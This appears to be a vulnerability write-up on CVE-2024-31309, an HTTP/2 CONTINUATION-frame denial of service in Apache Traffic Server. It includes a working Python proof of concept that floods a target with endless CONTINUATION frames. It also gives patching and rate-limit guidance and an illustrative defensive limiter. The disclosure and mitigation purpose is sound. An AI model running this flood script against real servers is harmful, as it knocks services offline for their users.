CVE-2024-31309 - How an HTTP/2 CONTINUATION DoS Attack Impacts Apache Traffic Server (With Exploit Details & Mitigation Guide)
Apache Traffic Server (ATS) is a powerful, flexible caching proxy server used by large companies and many critical web applications. However, like any complex software, it can have vulnerabilities. In early 2024, a serious issue, CVE-2024-31309, was disclosed, affecting ATS 8.0.0 through 8.1.9 and 9.0.0 through 9.2.3. If you use ATS for HTTP/2 traffic, this read is for you.
This post will explain the vulnerability in simple language, show you how an attacker can exploit it, and, most importantly, tell you how to fix it. We'll use clear code snippets, configuration tips, and share links to original resources at the end.
What is CVE-2024-31309?
CVE-2024-31309 is a Denial of Service (DoS) vulnerability in Apache Traffic Server's HTTP/2 implementation, specifically in how it processes CONTINUATION frames, the part of the HTTP/2 protocol used to carry a header block that does not fit in a single HEADERS frame.
If an attacker sends an uncontrolled number of CONTINUATION frames, ATS burns excessive CPU (and memory) handling them. The server slows down or even stops responding, so real users can't use your website or service.
Let’s make this clear.
In HTTP/2, a request's header block is HPACK-encoded and, if it does not fit in one HEADERS frame, split across a HEADERS frame followed by CONTINUATION frames; the block ends only when a frame carries the END_HEADERS flag. Vulnerable ATS versions put no cap on how many CONTINUATION frames they would accept for one header block. An attacker opens a stream with a HEADERS frame that lacks END_HEADERS and then streams CONTINUATION frames indefinitely; ATS parses every one of them while waiting for a header block that never completes, burning CPU (and buffer memory for any fragments it stores). With enough such connections, this can overwhelm or crash your server.
Proof-of-Concept (PoC) Exploit
Here's Python 3 code showing the basics of this attack. It uses the h2 library (pip install h2, which also pulls in hpack) for the connection preface and HPACK encoding, and builds the HEADERS and CONTINUATION frames by hand with struct, because h2 does not expose an API for sending a header block split across frames. It only demonstrates how CONTINUATION frames can stack up, is for educational purposes only, and must be run only against a test server you own.
import socket
import ssl
import struct
import h2.connection

HOST = 'YOUR_ATS_SERVER'  # Replace with an ATS test server you own
PORT = 443                # HTTP/2 over TLS (ALPN "h2")

def frame(frame_type, flags, stream_id, payload=b''):
    # RFC 7540 section 4.1 frame header: 24-bit length, 8-bit type,
    # 8-bit flags, reserved bit + 31-bit stream identifier, then payload
    return (len(payload).to_bytes(3, 'big') + bytes([frame_type, flags])
            + struct.pack('>I', stream_id & 0x7FFFFFFF) + payload)

# TLS with ALPN "h2"; certificate checks are disabled because this targets a lab box
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(['h2'])
s = ctx.wrap_socket(socket.create_connection((HOST, PORT)), server_hostname=HOST)

# Client connection preface plus initial SETTINGS, produced by h2
conn = h2.connection.H2Connection()
conn.initiate_connection()
s.sendall(conn.data_to_send())

# HEADERS frame (type 0x1) on stream 1 with an HPACK-encoded block, sent
# deliberately WITHOUT the END_HEADERS flag (0x4), so the header block stays open
headers = [
    (':method', 'GET'),
    (':scheme', 'https'),
    (':authority', HOST),
    (':path', '/'),
]
s.sendall(frame(0x1, 0x0, 1, conn.encoder.encode(headers)))

# Keep sending empty CONTINUATION frames (type 0x9) on the same stream and
# never set END_HEADERS, so the server never sees the header block complete
while True:
    s.sendall(frame(0x9, 0x0, 1))
What does this do?
- It opens an HTTP/2 connection and sends a HEADERS frame without END_HEADERS.
- It loops endlessly, pushing empty CONTINUATION frames for the same stream.
- ATS wastes resources waiting for a header block that never completes, and keeps using memory to store any fragments.
- With enough open connections, the server can become slow or unresponsive.
How to Fix It
Upgrade to a fixed release
Apache fixed CVE-2024-31309 in ATS 8.1.10 and 9.2.4; every later release carries the fix. Do this as soon as possible. Download the latest ATS releases from the official downloads page (linked in the references).
Tune the CONTINUATION rate limit
The fixed releases introduce a new records.config variable:
proxy.config.http2.max_continuation_frames_per_minute
It caps how many CONTINUATION frames ATS accepts per minute on a single HTTP/2 connection before it closes that connection; the fixed releases ship with a default of 120. Lowering it tightens the budget an abusive client gets. Be careful with very low values: a well-behaved client only emits CONTINUATION frames when a header block does not fit in one frame (16 KiB by default), so most connections send none, but a multiplexing client with large cookies can legitimately send several per minute. Values like 10–20 are enough for most web traffic, but measure your own clients first, because a client that trips the limit loses its whole connection, not just one request.
Note that this variable only exists in the fixed releases. It is the knob on the fix, not a substitute for it: on 8.1.9, 9.2.3 and earlier builds there is no such limit, and the only real remedy is the upgrade.
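To show what a per-minute CONTINUATION budget actually does on the wire, here is an added example written for this post; it is not ATS code and does not reproduce ATS internals. It pairs a minimal HTTP/2 frame parser with a per-connection sliding-window limiter modelled on the max_continuation_frames_per_minute idea, and also enforces the RFC 7540 rule that nothing but a CONTINUATION frame on the same stream may follow an unfinished header block. The frame constants, the 60-second window, the verdict strings and the sample byte strings (BENIGN and FLOOD) are all constructed for the example.

```python
import struct
import time
from collections import deque

# HTTP/2 frame types and flags from RFC 7540 section 6 (constants chosen for this example)
HEADERS, CONTINUATION = 0x1, 0x9
END_HEADERS = 0x4


def frame(ftype, flags, stream_id, payload=b''):
    """Serialize one frame: 24-bit length, type, flags, 31-bit stream id, payload."""
    return (len(payload).to_bytes(3, 'big') + bytes([ftype, flags])
            + struct.pack('>I', stream_id & 0x7FFFFFFF) + payload)


def parse_frames(buf):
    """Split buf into (type, flags, stream_id, payload) tuples.
    Returns the complete frames and whatever trailing partial frame is left over."""
    frames = []
    while len(buf) >= 9:
        length = int.from_bytes(buf[:3], 'big')
        if len(buf) < 9 + length:
            break
        ftype, flags = buf[3], buf[4]
        stream_id = struct.unpack('>I', buf[5:9])[0] & 0x7FFFFFFF
        frames.append((ftype, flags, stream_id, buf[9:9 + length]))
        buf = buf[9 + length:]
    return frames, buf


class ContinuationLimiter:
    """Per-connection CONTINUATION budget over a sliding 60-second window.
    Illustrates the max_continuation_frames_per_minute idea; not ATS code."""

    def __init__(self, max_per_minute, clock=time.monotonic):
        self.max_per_minute = max_per_minute
        self.clock = clock            # injectable so tests are deterministic
        self.timestamps = deque()     # arrival times of recent CONTINUATION frames
        self.pending_stream = None    # stream whose header block is still open

    def observe(self, ftype, flags, stream_id):
        """Return 'ok', or the reason the connection should be torn down."""
        now = self.clock()
        if self.pending_stream is not None:
            # RFC 7540 section 6.10: while a header block is open, only CONTINUATION
            # frames on that same stream are legal; anything else is a
            # connection-level PROTOCOL_ERROR. (A client must not send
            # PUSH_PROMISE, so HEADERS is the only block opener handled here.)
            if ftype != CONTINUATION or stream_id != self.pending_stream:
                return 'PROTOCOL_ERROR: header block interrupted'
            self.timestamps.append(now)
            while self.timestamps and now - self.timestamps[0] >= 60.0:
                self.timestamps.popleft()
            if len(self.timestamps) > self.max_per_minute:
                return 'ENHANCE_YOUR_CALM: CONTINUATION rate exceeded'
        elif ftype == CONTINUATION:
            return 'PROTOCOL_ERROR: CONTINUATION without HEADERS'
        if ftype in (HEADERS, CONTINUATION):
            # The block stays open until a frame carries END_HEADERS
            self.pending_stream = None if flags & END_HEADERS else stream_id
        return 'ok'


def scan_connection(buf, max_per_minute, clock=time.monotonic):
    """Run every complete frame in buf through a fresh limiter.
    Returns (verdict, number of frames consumed up to and including the verdict)."""
    limiter = ContinuationLimiter(max_per_minute, clock)
    frames, _rest = parse_frames(buf)
    for count, (ftype, flags, stream_id, _payload) in enumerate(frames, 1):
        verdict = limiter.observe(ftype, flags, stream_id)
        if verdict != 'ok':
            return verdict, count
    return 'ok', len(frames)


# Constructed sample traffic (not captured from a real server). 0x82 and 0x86 are
# HPACK indexed fields (:method GET, :scheme http); the content is irrelevant here.
BENIGN = frame(HEADERS, 0x0, 1, b'\x82') + frame(CONTINUATION, END_HEADERS, 1, b'\x86')
FLOOD = frame(HEADERS, 0x0, 1, b'\x82') + frame(CONTINUATION, 0x0, 1) * 500

if __name__ == '__main__':
    print(scan_connection(BENIGN, 120))   # ('ok', 2)
    print(scan_connection(FLOOD, 120))    # ('ENHANCE_YOUR_CALM: CONTINUATION rate exceeded', 122)
```

With the default-like budget of 120, the flood is cut off at the 121st CONTINUATION frame (frame 122 counting the HEADERS), while a normal split header block passes. The limiter counts only CONTINUATION frames, so a client sending many small complete requests is never penalised; the cost of a too-low budget is that a legitimate client with oversized header blocks loses the whole connection, which is the trade-off to keep in mind when tuning the real setting.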
Memory Limits
ATS has long limited how much header data it buffers per request, so this bug is not simply a memory-exhaustion issue: even empty CONTINUATION frames cost CPU to parse and dispatch, and with no cap on their number an attacker can keep a worker busy indefinitely. Existing memory limits therefore do not make you safe; do not skip the upgrade or the configuration change.
References
- Official CVE entry: CVE-2024-31309 at NVD
- Apache Traffic Server security advisory:
https://lists.apache.org/thread/z7b6j3mbvt6kjqp58snztg2jm7np99b9
- Apache Traffic Server downloads:
https://downloads.apache.org/trafficserver/
- HTTP/2 CONTINUATION frame specification: RFC 7540, Section 6.10 (the current HTTP/2 specification, RFC 9113, keeps the same section number)
- Python h2 library (for HTTP/2 fuzzing/testing):
https://python-hyper.org/h2/en/stable/
Summary
- CVE-2024-31309 affects HTTP/2 handling in Apache Traffic Server 8.0.0–8.1.9 and 9.0.0–9.2.3, allowing denial of service with a flood of CONTINUATION frames.
- Update to at least 8.1.10 or 9.2.4 for a permanent fix.
- Once upgraded, tune proxy.config.http2.max_continuation_frames_per_minute to the budget your clients actually need; it is part of the fix, not a stopgap for vulnerable versions.
- Don't ignore this if you serve web traffic with HTTP/2 and ATS!
Timeline
Published on: 04/10/2024 12:15:09 UTC
Last modified on: 11/12/2024 19:35:07 UTC